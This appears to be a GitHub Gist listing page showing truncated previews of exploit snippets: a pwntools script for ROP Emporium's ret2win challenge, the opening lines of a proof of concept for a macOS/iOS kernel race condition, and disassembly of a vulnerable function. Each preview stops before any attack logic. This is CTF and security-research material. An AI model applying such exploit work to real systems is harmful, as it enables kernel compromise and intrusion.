Skip to content

Instantly share code, notes, and snippets.

@zachriggle
zachriggle / win.py
Created Sep 1, 2017
Example Exploit for ROP Emporium's ret2win Challenge Raw
View win.py
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('ret2win')
# Enable verbose logging so we can see exactly what is being sent.
context.log_level = 'debug'
# Print out the target address
info("%#x target", elf.symbols.ret2win)
@zachriggle
zachriggle / poc.c
Created Sep 16, 2021 — forked from UESTC-LXY/poc.c
macOS 11.5.2/iOS 14.7.1 Kernel Race Condition poc
View poc.c
/*
Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab
use it on macOS: cc poc.c -o poc while True; do ./poc ; done
*/
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
View win.py
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100